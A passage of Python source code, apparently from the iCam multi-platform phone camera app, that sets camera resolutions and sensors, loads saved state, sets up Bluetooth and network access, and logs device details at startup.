]
DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s." % \
str(cameraPhotoSizes_JPEG_Exif[0]))
"""
!!!!if cameraPhotoSizes_JPEG_Exif[1][0] != (640, 480):
cameraPhotoSizes_JPEG_Exif[1] = [(640, 480), (320, 240)]
"""
elif (phoneModel in ["Nokia6120", "NokiaE63"]) and \
(cameraPhotoSizes_JPEG_Exif[0][0] != (1600, 1200)):
cameraPhotoSizes_JPEG_Exif[0] = [
(1600, 1200),
(1152, 864),
(640, 480),
(320, 240)
]
DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s." % \
str(cameraPhotoSizes_JPEG_Exif[0]))
"""
#N97, E75
elif (phoneModel == "NokiaC7") and (cameraPhotoSizes_JPEG_Exif[0][0] != \
(2048, 1536)):
cameraPhotoSizes_JPEG_Exif[0] = [(2048, 1536), (1600, 1200),
(1280, 960), (1024, 768), (640, 480)]
DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s" %
str(cameraPhotoSizes_JPEG_Exif[0]))
"""
#!!!!TODO: If we do the correction above, we could get in take_photo() exception "ValueError: Size not supported for camera"
#!!!!TODO: think how to do exactly. Maybe do again GeneralUseCameraS60(0), (1) with the right orientation!!!! Or maybe take out the check in camera2.take_photo(). Or, in iCam.TakePhotoAndUpload() if you get exception use the next resolution.
#camera.device[0].image_size(modeMap[mode]) ~= cameraPhotoSizes_JPEG_Exif[0]
#camera.device[1].image_size(modeMap[mode]) ~= cameraPhotoSizes_JPEG_Exif[1]
def MainSetCameraParams():
global sensorsAvailable
#global accSensor, rotSensor
global numCamerasSupported
global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
global localVideoModeIndex
global localVideoMode
DebugPrint("Entered MainSetCameraParams(): camera params and init sensors.")
# Every (Symbian) phone should support this resolution. !!!!TODO: differentiate if phone has 0, 1 or 2 cameras
localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]
if ANDROID_OS:
sensorsAvailable = ""
numCamerasSupported = 1
cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
cameraPhotoSizes_RGB24 = [[(320, 240)], []]
# localPhotoResolutionIndex[0]
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
try:
if logAccelerometerAndRotationSensors:
if phoneModel in ["NokiaN95", "NokiaN82"]:
accSensor = sensor.Sensor(sensor.sensors()["AccSensor"]["id"],
sensor.sensors()["AccSensor"]["category"])
accSensor.connect(AccSensorCallback)
rotSensor = sensor.Sensor(sensor.sensors()["RotSensor"]["id"],
sensor.sensors()["RotSensor"]["category"])
rotSensor.connect(RotSensorCallback)
SetCameraParamsS60()
except:
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
sensorsAvailable = ""
# if phoneModel in ["Nokia 6120", "Nokia N95"]:
# SetUIOrientation(0, True)
numCamerasSupported = 1
cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
cameraPhotoSizes_RGB24 = [[(320, 240)], []]
# localPhotoResolutionIndex[0]
elif iOS_PYOBJC:
sensorsAvailable = ""
# numCamerasSupported = 0
numCamerasSupported = 1
cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
cameraPhotoSizes_RGB24 = [[(320, 240)], []]
# localPhotoResolutionIndex[0]
elif WINDOWS_CE_OS_PYTHONCE:
sensorsAvailable = ""
# numCamerasSupported = 0
numCamerasSupported = 1
cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
cameraPhotoSizes_RGB24 = [[(320, 240)], []]
# localPhotoResolutionIndex[0]
elif RASPBIAN_OS:
sensorsAvailable = ""
# numCamerasSupported = 0
numCamerasSupported = 1
cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
cameraPhotoSizes_RGB24 = [[(320, 240)], []]
# localPhotoResolutionIndex[0]
# localVideoMode = [((320, 240), 15.0), ((176, 144), 15.0)]
# localVideoMode = [(640, 480), (176, 144)]
"""
#!!!!
#camera.release()
##camera._my_camera = camera._camera.Camera(0)
#camera.UseCamera(0)
GeneralUseCameraS60(0)
"""
if numCamerasSupported == 0:
cameraVideoFormats[0] = []
cameraVideoFrameSizes[0] = []
cameraVideoModes[0] = []
else:
#if numCamerasSupported >= 1:
if cameraVideoFormats[0] == []:
cameraVideoFrameSizes[0] = [(176, 144)]
cameraVideoModes[0] = [{"rate": 15.0, "size": (176, 144)}]
if numCamerasSupported == 2:
if cameraVideoFormats[1] == []:
cameraVideoFrameSizes[1] = [(176, 144)]
cameraVideoModes[1] = [{"rate": 15.0, "size": (176, 144)}]
else:
#if numCamerasSupported == 1:
cameraVideoFormats[1] = []
cameraVideoFrameSizes[1] = []
cameraVideoModes[1] = []
"""
In case something changed (e.g., on S60 camera2 module doesn't exist), we
make sure the indices are within the valid values.
TODO!!!! This check is repeated in RecordConfigMenu() so REUSE CODE.
"""
global localVideoModeIndex
for i in range(2):
if (localVideoModeIndex[i] < 0) or \
(localVideoModeIndex[i] >= len(cameraVideoModes[i])):
localVideoModeIndex[i] = 0
###########################################################################
###########################################################################
##########################END CAMERA PARAMETER SET#########################
###########################################################################
###########################################################################
def MainLoadStateAndConfig():
global accessPointName
global stateLoaded
try:
DebugPrint("MainLoadStateAndConfig(): Reading configuration.")
#!!!!TODO: we load again the state, but now we have std*.txt created.
if LoadStateFromFile(STATE_PATH_FILENAME):
DebugPrint("MainLoadStateAndConfig(): Read configuration from %s " \
"(or its backup if this file doesn't exist)." % \
STATE_PATH_FILENAME)
"""
if (deviceId == IMEI_6120) or (deviceId == IMEI_6680):
global bluetoothServerAddress
#bluetoothServerAddress = BT_ADDR_N95
bluetoothServerAddress = INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS
"""
else:
DebugPrint("MainLoadStateAndConfig(): LoadStateFromFile() " \
"ret False.")
# Preserve this order of initializing the state variables.
# if deviceId == IMEI_6120: #Nokia 6120
# if deviceId == IMEI_N95: #Nokia N95
if deviceId == INTERNET_PROXY_PHONE_DEVICE_ID:
if accessPointName == u"":
# accessPointName = u"RDSPP"
accessPointName = u"RDS"
DebugPrint("MainLoadStateAndConfig(): accessPointName " \
"is empty so made it %s." % str(accessPointName))
# else:
# accessPointName = u""
LoadLocalConfigFromFile(LOCAL_CONFIG_PATH_FILENAME)
if bluetoothMode == 1: # BT server
LoadBtMsgMostRecentTime()
DebugPrint("Exiting MainLoadStateAndConfig().")
except:
DebugPrintErrorTrace()
stateLoaded = True
def Main():
global LOCAL_FOLDER
# global myTimer
global localPhotoResolution, localVideoMode, localQualityIndex
global photoResolutionStr, photoModeStr, pauseIntervalStr, \
exposureStr, whiteBalanceStr, flashStr
global digitalZoom, photoResolutionIndex, \
localPhotoResolutionIndex, photoModeIndex, photoQuality, \
pauseInterval, reactiveLoopOpsIndex , exposureIndex, \
whiteBalanceIndex, flashIndex
global audioRecordDuration, videoRecordDuration, rotateDegreesImage
global mobileCountryCode, mobileNetworkCode, locationAreaCode, \
cellId # GSM location info
global signalStrength, signalUnits
global accessPointName, bluetoothMode
global gpsInfo, readGPS
global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
global myMaxRamdriveSize
global numCamerasSupported
global deviceId, phoneModel, orientationForThisPhoneModel
global pyS60VersionNumber
global bluetoothSelfAddress, bluetoothSelfName
global accessPointRetryConnect
global startButtonPressed, startAutomatically
global STATE_PATH_FILENAME
global sensorsAvailable
global stateLoaded
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global MY_DEBUG_UPLOAD_MSG
global OSName
DebugPrint("Entered Main().")
#EraseOldestFilesAndMessages()
if False:
EraseOldestFilesFromFolderWithFileCountQuota(LOCAL_FOLDER,
filterString="stdout_",
fileCountQuota=100)
EraseOldestFilesFromFolderWithFileCountQuota(LOCAL_FOLDER,
filterString="stderr_",
fileCountQuota=100)
MainLoadStateAndConfig()
LoadMDExtensionScript()
global OSName
if ANDROID_OS:
OSName = "Android"
elif SYMBIAN_S60_OS:
# Put S60 as well.
OSName = "Symbian"
elif SYMBIAN_UIQ_OS:
OSName = "Symbian UIQ"
elif iOS_PYOBJC:
OSName = "iOS"
elif UNIX_OS:
OSName = "UNIX"
elif WINDOWS_OS:
OSName = "Windows"
elif WINDOWS_CE_OS_PYTHONCE:
#OSName = "Windows"
OSName = "WinCE"
phoneModel = GetPhoneModel()
# Here, the orientationForThisPhoneModel could be wrong.
#MainLog2()
if ANDROID_OS:
#myRes = DialogGetInput("blabla", "blamore", "blaInit")
#DisplayNote(myRes)
pass
elif SYMBIAN_OS:
SetupSymbian()
"""
while True:
e32.ao_sleep(1.0)
"""
#LoadMDExtensionScript()
# DisplayNote("Testing.")
#phoneModel = GetPhoneModel()
MainSetUI()
# We do this to try to avoid having issues with the read camera resolution:
SleepAndPetWatchdog(2.0)
"""
MainSetCameraParams() needs to be after MainSetUI() because MainSetUI()
sets the orientation (on S60) and otherwise the read resolutions
could be wrong.
"""
MainSetCameraParams()
MainLog2()
#MainSetCameraParams()
if False: #deviceId == IMEI_E7:
# We start some profiling
"""
# Doesn't work on PyS60: - gives exception:
# profile.py, line 462, in runctx
# NameError: name 'GetGSMLocation' is not defined
profile.run("GetGSMLocation()")
#profile.run("print 1")
"""
pr = profile.Profile()
pr.runcall(GetGSMLocation)
filename = "profiling_data_iCam"
#filename = None
if filename is not None:
pr.dump_stats(filename)
"""
myProfile = hotshot.Profile("hotshot_stats")
myProfile.runcall(GetGSMLocation)
myProfile.close()
"""
else:
GetGSMLocation()
if ANDROID_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
try:
myMaxRamdriveSize = sysinfo.max_ramdrive_size()
except:
DebugPrintErrorTrace()
myMaxRamdriveSize = -1
try:
signalStrength = sysinfo.signal_dbm()
signalUnits = "dbm"
except:
DebugPrintErrorTrace()
try:
signalStrength = sysinfo.signal_bars()
signalUnits = "bars"
if signalStrength < 0:
signalStrength = NO_GSM_SIGNAL_STRENGTH
except:
signalStrength = NO_GSM_SIGNAL_STRENGTH
signalUnits = "none"
# accessPointName = u""
accessPointRetryConnect = True
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif iOS_PYOBJC:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif UNIX_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
numCamerasSupported = 0
accessPointName = u"Linux_PC_Internet_Connection"
localPhotoResolutionIndex = [-1, -1]
elif WINDOWS_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
numCamerasSupported = 0
accessPointName = u"Windows_PC_Internet_Connection"
localPhotoResolutionIndex = [-1, -1]
"""
YouTubeVideoUploadThroughProxy(pathFileName = "./CurrentSymLink_1.3gp",
fileName = "CurrentSymLink_1.3gp", aKeyword = "myDeviceId",
crtTime = None, mediaTimeStr = "", mediaDateStr = "",
deviceId = "", cameraId = 0)
return
"""
"""
res = UploadStateAndFileAndStoreState("[NOT_USED_DEVICE_ID]", 0,
"VIDEO0900.mp4", "./VIDEO0900.mp4", ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
return
"""
elif WINDOWS_CE_OS_PYTHONCE:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
##!!!!!!!Put all localPhotoResolutionIndex = [-1, -1] above and the code below in MainSetCameraParams()
# JPEG_Exif for Main camera and RGB24 for VGA camera.
photoModeIndex = [3, 2]
"""
if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82", "NokiaN8"]:
# JPEG_Exif for Main camera and RGB24 for VGA camera.
photoModeIndex = [3, 2]
elif phoneModel == "Nokia6680":
# RGB24 for Main camera and RGB24 for VGA camera
#photoModeIndex = [2, 2]
# For Nokia 6680 JPEG_Exif for Main camera and RGB24 for VGA
# camera - JPEG_Exif and 1280x960 gives out of mem exception (but it
# appears RGB24 and 1280x960 does not)- see!!!!
# Logs\Nokia6680\34_JPEG_Exif_imageMode_rear_capture_error_Out_of_mem
photoModeIndex = [3, 2]
else:
# For Nokia 6680 JPEG_Exif for Main camera and RGB24 for VGA
# camera - JPEG_Exif and 1280x960 gives out of mem exception (but it
# appears RGB24 and 1280x960 does not)- see!!!!
# Logs\Nokia6680\34_JPEG_Exif_imageMode_rear_capture_error_Out_of_mem
photoModeIndex = [3, 2]
"""
"""
On Nokia 6680, setting the photo mode when calling take_photo() returns:
KErrNoMemory for RGB12
"Size not supported for camera" if we give RGB16
"Size not supported for camera" if we give JPEG_Exif
RGB24 gives error
for pic.resize (from SetDigitalZoom)
SymbianError: [Errno -4] Error resizing image:KErrNoMemory
OR
for take_photo: SymbianError: [Errno -4] KErrNoMemory
"""
"""
if GetFreeRAM() < cameraPhotoSizes[0][0] * cameraPhotoSizes[0][1] * 3 * 2:
# If we have less than 6MB RAM use 2nd biggest resolution (for Nokia
# 6680, we had ~5MB free and when trying to capture at biggest
# res - 1280x968 - and resizing it was running out of memory).
#if GetFreeRAM() < 6 * 1024 * 1024:
localPhotoResolutionIndex = [1, len(cameraPhotoSizes) - 1]
# On Nokia 6680, using localPhotoResolutionIndex[0] = 0 (i.e., 1280x960
# photo resolution for Main camera) makes take_photo give error:
# "SymbianError: [Errno -4] KErrNoMemory" even if we have 6.1MB free
# on the C drive.
# Or: "SymbianError: [Errno -4] Error resizing image:KErrNoMemory"
# See Logs\Nokia6680\14, 15 and 16
else:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, len(cameraPhotoSizes) - 1]
"""
if numCamerasSupported == 1:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, -1]
elif numCamerasSupported == 2:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, len(cameraPhotoSizes_RGB24[1]) - 1]
DebugPrint("Main(): localPhotoResolutionIndex = %s" % \
str(localPhotoResolutionIndex))
"""
try:
UploadUnsentFILES()
except:
DebugPrintErrorTrace()
"""
"""
try:
# Basically telephone module can't be used on S60 2nd ed.
# phone_ext should be used instead.
#See http://discussion.forum.nokia.com/forum/showthread.php?120891-Bind-an-incoming-call
# "For 2nd edition it should be more difficult because there's no
# official function available for this.
# Try this : download SMSCoop in it there's a phone_ext.pyd
# extension. Install it in your phone.
# This extension provide similar functionalities."
telephone.call_state(TelephoneCallback)
#telephone.incoming_call()
except: #AttributeError ImportError:
exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
myText = "The telephone module does not work - most likely because " \
"you are using a 2nd edition S60 cellphone - reported " \
"to have issues with the telephone module. "\
"Exception details: %s." \
% repr( traceback.format_tb(exceptionTraceback) )
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
DebugPrintErrorTrace()
"""
# #########################################################################
# #########################################################################
# ########## By now the iCam UI and device params are set up. ##########
# #########################################################################
# #########################################################################
MainConnectivity()
# #########################################################################
# ########NOW PHONE SHOULD HAVE CONNECTIVITY - 3G and/or Bluetooth#########
# ###IMPORTANT: DO NOT UPLOAD OR DOWNLOAD ANYTHING BEFORE HERE, BECAUSE####
# ################IT MIGHT POP A MENU ASKING FOR ACCESS POINT##############
# #########################################################################
global sentBTMessageTo6680
if sentBTMessageTo6680 == 1:
"""
Since it is possible that iCam is stopped when power comes back and
we miss this event we have saved as part of state sentBTMessageTo6680
in order to check and act, if necessary.
"""
ExecuteCommands("send-command-via-bluetooth " + BT_ADDR_6680 + \
" set-pause-interval 240")
sentBTMessageTo6680 = 0
StoreState()
MainLog()
MainTestCommands()
MainStartReactiveLoops()
def MainConnectivity():
global accessPointName, accessPointRetryConnect
global stateLoaded
DebugPrint("Entered MainConnectivity().")
stateLoaded = True
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
DisplayRedrawInfo()
# #########################################################################
# #########################################################################
# #### We set the bluetoothMode, and connect to the access point, if ###
# ##### appropriate - note that AP connection takes little on Symbian.#####
# ###### We also download any commands and execute them ASAP, at the ######
# ##### beginning - useful to prevent erroneous modes #####################
# #########################################################################
# #########################################################################
if bluetoothMode == -1:
# if bluetoothServerAddress == "":
SelectBluetoothMode()
elif bluetoothMode == 1:
# BluetoothServer
BluetoothServerInitialize()
elif bluetoothMode == 2:
# BluetoothClient.
BluetoothClientDiscoverServer()
BluetoothClientInitializeInbox()
# This (also) has the effect of downloading commands received via BT
# - equivalent to DownloadCommands().
#if WINDOWS_OS == False:
if WINDOWS_OS:
pass
else:
BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
SetLocalPhotoResolution()
"""
accessPointName = u""
accessPointRetryConnect = True
"""
if bluetoothMode == 2:
"""
or signalStrength == NO_GSM_SIGNAL_STRENGTH:
!!!!Remember or figure out when was the case
signalStrength == NO_GSM_SIGNAL_STRENGTH
useful.
It is not a good idea to check also
signalStrength == NO_GSM_SIGNAL_STRENGTH because
we can arrive in this case when there is no valid SIM card
or no SIM card at all.
"""
DebugPrint("Main(): Setting accessPointRetryConnect = True.")
accessPointRetryConnect = True
else:
# We can choose a WiFI or 3G Acess Point:
SelectAccessPointIfNoneAvailableAndConnectToIt()
# This function doesn't really connect to the Internet and works fast.
# thread.start_new_thread(
# SelectAccessPointIfNoneAvailableAndConnectToIt, ())
if deviceId == IMEI_E7:
appuifw.note(u"Connected to AP!", "info")
if bluetoothMode != 2: # ~IMPORTANT: we want to prevent to try to connect to the Internet
# TODO: Maybe we should synchronize more than once per run.
TimeSyncNTP()
if False:
# We attempt to synchronize the time with the iCam server:
if useiCamServer > 0:
TimeSyncWithiCamServer()
myTextInit = ""
def MainLog2():
global myTextInit
# myText1 = "Started application on %s." % datetime.datetime.now().ctime()
try:
myText = "<br/><br/>Started application on %s - %s version. " \
"Release time: %s. " % \
(GetCurrentDateTimeStringNice(), OSName,
CURRENT_RELEASE_TIME)
except:
myText = ""
DebugPrintErrorTrace()
try:
myText += "Python version: %s. " % str(sys.version_info)
except:
DebugPrintErrorTrace()
try:
myText += "deviceId = %s. phoneNumber = %s. " % (deviceId, phoneNumber)
"""
#From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
(see also http://ubuntuforums.org/showthread.php?t=961505):
if ANDROID_OS:
myStatVFS = os.statvfs("/sdcard")
elif SYMBIAN_OS:
myStatVFS = os.statvfs(r"C:")
myText += "Free drive space %d." % ((myStatVFS.f_bavail *
myStatVFS.f_frsize) / 1024)
#Java code from http://android.bigresource.com/Track/android-7gosN9ZDf/:
#StatFs stat = new StatFs(
# Environment.getExternalStorageDirectory().getAbsolutePath());
#stat.restat(
# Environment.getExternalStorageDirectory().getAbsolutePath());
#long available = ((long) stat.getAvailableBlocks() *
# (long) stat.getBlockSize());
"""
except:
DebugPrintErrorTrace()
try:
if ANDROID_OS:
def ShowMap(myMap):
try:
res = ""
for (keyIter, valueIter) in myMap.iteritems():
# print k,"=",v
res += "%s = %s" % (keyIter, valueIter)
except:
DebugPrintErrorTrace()
myText1 = ""
try:
myText1 += "Build" \
+ ShowMap(myDroid.getConstants("android.os.Build").result)
except:
DebugPrintErrorTrace()
try:
myText1 += "Version" + ShowMap(myDroid.getConstants(
"android.os.Build$VERSION").result)
except:
DebugPrintErrorTrace()
try:
myText1 += "Model" + ShowMap(myDroid.getConstants(
"android.os.Build$MODEL").result)
except:
DebugPrintErrorTrace()
# DisplayNote(myText1)
myText += myText1 + "phoneModel = %s. Firmware version = %s.\n" % \
(str(phoneModel),
str(myDroid.getDeviceSoftwareVersion().result))
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
myText += "phoneModel = %s. Firmware version = %s. " \
"OS = Symbian version %s.\n" % \
(str(phoneModel), sysinfo.sw_version(),
sysinfo.os_version())
elif WINDOWS_CE_OS_PYTHONCE:
myText += "phoneModel = %s. OS = WinCE.\n" % str(phoneModel)
else:
pass
except:
DebugPrintErrorTrace()
try:
myText += "sys.platform = %s. " % sys.platform
except:
DebugPrintErrorTrace()
try:
if ANDROID_OS:
myText += "Python for Android version %s.\n" % "[NOT_AVAILAVABLE]"
elif SYMBIAN_OS:
# elif SYMBIAN_OS and SYMBIAN_S60_OS:
myText += "S60 version %s, pyS60VersionNumber = %d. " \
"PyS60 version info = %s.\n" % \
(S60_EDITION, pyS60VersionNumber,
e32.pys60_version_info)
elif WINDOWS_CE_OS_PYTHONCE:
myText += "PythonCE version %s.\n" % "[NOT_AVAILAVABLE]"
except:
DebugPrintErrorTrace()
try:
myText += "bluetoothSelfAddress = %s. bluetoothSelfName = %s. " \
"bluetoothMode = %d. \n" % \
(bluetoothSelfAddress, bluetoothSelfName, bluetoothMode)
except:
DebugPrintErrorTrace()
try:
myText += "pauseInterval = %d. " \
"pauseIntervalGdata = %d. " \
"reactiveLoopOpsIndex = %d. " \
"sentBTMessageTo6680 = %d. " \
"numCamerasSupported = %d. cameraMode[0] = %d. " \
"cameraMode[1] = %d. orientationForThisPhoneModel = %s.\n" % \
(
pauseInterval,
pauseIntervalGdata,
reactiveLoopOpsIndex,
sentBTMessageTo6680,
numCamerasSupported,
cameraMode[0], cameraMode[1],
orientationForThisPhoneModel)
if numCamerasSupported > 0:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "Main camera: possible photo resolutions: for " \
"JPEG_Exif %s; for RGB24 %s. " % \
(cameraPhotoSizes_JPEG_Exif[0],
cameraPhotoSizes_RGB24[0])
myText += "image_modes() = %s. flash_modes() = %s, " \
"max_zoom() = %d, exposure_modes() = %s, " \
"white_balance_modes() = %s.\n" % \
(camera.image_modes(), camera.flash_modes(),
camera.max_zoom(), camera.exposure_modes(),
camera.white_balance_modes())
if numCamerasSupported == 2:
"""
camera.release()
#camera._my_camera = camera._camera.Camera(1)
camera.UseCamera(1)
"""
myText += "VGA camera: possible photo resolutions: for " \
"JPEG_Exif %s, RGB24 %s.\n" % \
(cameraPhotoSizes_JPEG_Exif[1],
cameraPhotoSizes_RGB24[1])
if camera2IsImported:
myText += "image_modes() = %s. flash_modes() = %s, " \
"max_zoom() = %d, exposure_modes() = %s, "\
"white_balance_modes() = %s. \n" % \
(camera.image_modes(
camera.device[1].image_modes()),
camera.flash_modes(
camera.device[1].flash_modes()),
camera.max_zoom(),
camera.exposure_modes(
camera.device[1].exposure_modes()),
camera.white_balance_modes(
camera.device[1].white_balance_modes()))
else:
"""
!!!!Should switch to the VGA camera
#myText += "image_modes() = %s. flash_modes() = %s, " \
# "max_zoom() = %d, exposure_modes() = %s, "\
# "white_balance_modes() = %s. "
# % (camera.image_modes(),
# camera.flash_modes(),
# camera.max_zoom(),
# camera.exposure_modes(),
# camera.white_balance_modes())
"""
pass
"""
camera.release()
#camera._my_camera = camera._camera.Camera(0)
camera.UseCamera(0)
"""
else:
pass
except:
DebugPrintErrorTrace()
# Here we were setting the video recording configuration for camera 0.
if SYMBIAN_OS:
try:
if camera2IsImported:
myText += myTextMainCamera2Video
except:
DebugPrintErrorTrace()
try:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "sensorsAvailable = %s. Active profile = %s. " \
"ring_type = %s. \n" % \
(sensorsAvailable, sysinfo.active_profile(),
sysinfo.ring_type())
else:
pass
except:
DebugPrintErrorTrace()
try:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# It seems always GetFreeDriveSpace("D:") = free_ram().
myText += "total_ram = %d, max_ramdrive_size = %d, " \
"free_ram = %d. total_rom = %d. Free space in " \
"bytes on drive C = %d, on drive D = %d, on drive " \
"E = %d. \n" % \
(sysinfo.total_ram(), myMaxRamdriveSize,
GetFreeRAM(), sysinfo.total_rom(),
GetFreeDriveSpace("C:"), GetFreeDriveSpace("D:"),
GetFreeDriveSpace("E:"))
if misoIsImported:
myText += "miso: num_alloc_heap_cells() = %d, " \
"num_free_heap_cells() = %d, " \
"alloc_heap_cells_size() = %d, " \
"heap_total_avail() = %d, " \
"heap_biggest_avail() = %d, " \
"heap_base_address() = %d, stack_info() = %s. \n" % \
(miso.num_alloc_heap_cells(),
miso.num_free_heap_cells(),
miso.alloc_heap_cells_size(),
miso.heap_total_avail(),
miso.heap_biggest_avail(),
miso.heap_base_address(),
str(miso.stack_info()))
elif ANDROID_OS:
myText += "Free space in bytes on LOCAL_DRIVE = %d. \n" % \
GetFreeDriveSpace(LOCAL_DRIVE)
except:
DebugPrintErrorTrace()
try:
myText += "battery = %d. charger_status = %d. \n" % \
(GetBatteryLevelPercentage(), GetChargerStatus())
myText += "MY_DEBUG_STDOUT = %d, MY_DEBUG_STDERR = %d, " \
"MY_DEBUG_STDERR_2 = %d, MY_DEBUG_UPLOAD_MSG = %d. \n" % \
(MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG)
myText += "LOCAL_FOLDER = %s, LOCAL_FOLDER_MEDIA_FILES = %s.\n" \
"STDOUT file name = %s. STDERR file name = %s.\n" % \
(LOCAL_FOLDER, LOCAL_FOLDER_MEDIA_FILES, stdoutFileName,
stderrFileName)
myText += "startAutomatically = %d. \n" % \
startAutomatically
myText += "uploadMediaToYouTube = %d, uploadMediaToPicasa = %d, " \
"useiCamServer = %d. " % \
(uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer)
"""
myText += "uploadMediaToYouTube = %d, uploadMediaToPicasa = %d, " \
"useiCamServer = %d, USE_ICAM_SERVER = %d." \
% (uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer, USE_ICAM_SERVER)
"""
myText += "internetUploadMaxErrors = %d. " \
"QoS params: storeLocallyMedia = %d, " \
"saveUnsentPackets = %d, " \
"SOCKET_DEFAULT_TIMEOUT = %.2f, uploadUnsentData = %d, " \
"uploadHowManyOfLatestBluetoothMessages = %d, " \
"MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = %d, " \
"ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = %d. " % \
(
internetUploadMaxErrors,
storeLocallyMedia,
saveUnsentPackets,
SOCKET_DEFAULT_TIMEOUT,
uploadUnsentData,
uploadHowManyOfLatestBluetoothMessages,
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD,
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ
)
myText += "ICAM_SERVER_NAME = %s.\n" % ICAM_SERVER_NAME
myText += "BATTERY_LEVEL_THRESHOLD = %d.\n" % BATTERY_LEVEL_THRESHOLD
myText += "localPhotoResolution = %s.\n" % str(localPhotoResolution)
myText += "localVideoMode = %s; localVideoModeIndex = %s.\n" % \
(str(localVideoMode), str(localVideoModeIndex))
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "displaySize = %s.\n" % str(sysinfo.display_pixels())
# displaySize
else:
pass
except:
DebugPrintErrorTrace()
myTextInit = myText
DebugPrint(myText)
def MainLog():
global localVideoMode
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
DebugPrint("Entered MainLog().")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS or ANDROID_OS:
if googleUsername is None:
SelectServersMenu()
if bluetoothMode != 2: # A BT client does NOT have Internet access
if deviceId == IMEI_E7:
"""
For the first access to the Internet we create a separate thread
and wait (but keep the UI responsive), since this access could
take long - it sets up the AP connection, etc.
The downloadCommandsCounter gets incremented/reset after every
Inet access.
"""
"""
We can set firstTime=-1 on SYMBIAN_OS, but it's required to be bool
on ANDROID_OS.
"""
SetMenu(firstTime=-1)
# This assignment has to be put before MyThreadStart(DownloadCommands)
crtDownloadCommandsCounter = downloadCommandsCounter
"""
We can execute DownloadCommands in a separate thread or
NOT (in case we run PyS60 1.4.5).
"""
MyThreadStart(DownloadCommands)
DebugPrint("MainLog(): Waiting for the DownloadCommands() " \
"thread to finish.")
"""
This primitive synchronization is OK - even if for some strange
reason downloadCommandsCounter changes before the other thread
finishes, we get out from waiting in this thread and proceed
without having some race conditions (I think).
Worst case we end up waiting quite a lot (once it was ~2 minutes?? :o )
until the while loop ends, even if we have SOCKET_DEFAULT_TIMEOUT = 20 -
see Z:\1PhD\ReVival\Logs\NokiaE7\2013_06_23_7_interesting_maybe_sync_issues\stdout_2013_06_23_14_44_26.txt.
"""
while crtDownloadCommandsCounter == downloadCommandsCounter:
SleepAndPetWatchdog(1.0)
#e32.ao_yield()
DebugPrint("MainLog(): DownloadCommands() thread finished.")
#SetMenu(firstTime=True)
SetMenu(firstTime=False)
else:
"""
def DownloadCommmandsThread():
DownloadCommands()
#thread.start_new_thread(DownloadCommmandsThread, ())
MyThreadStart(DownloadCommmandsThread)
"""
DownloadCommands()
# Otherwise the application gets blocked at .sms_send()
#if signalStrength != NO_GSM_SIGNAL_STRENGTH:
#if deviceId == IMEI_6120: #Nokia 6120
#if deviceId == INTERNET_PROXY_PHONE_DEVICE_ID:
if accessPointName == u"RDSPP":
CommunicateWithOperator()
"""
if accessPointRetryConnect:
CommunicateWithOperator()
"""
if MY_DEBUG_UPLOAD_MSG:
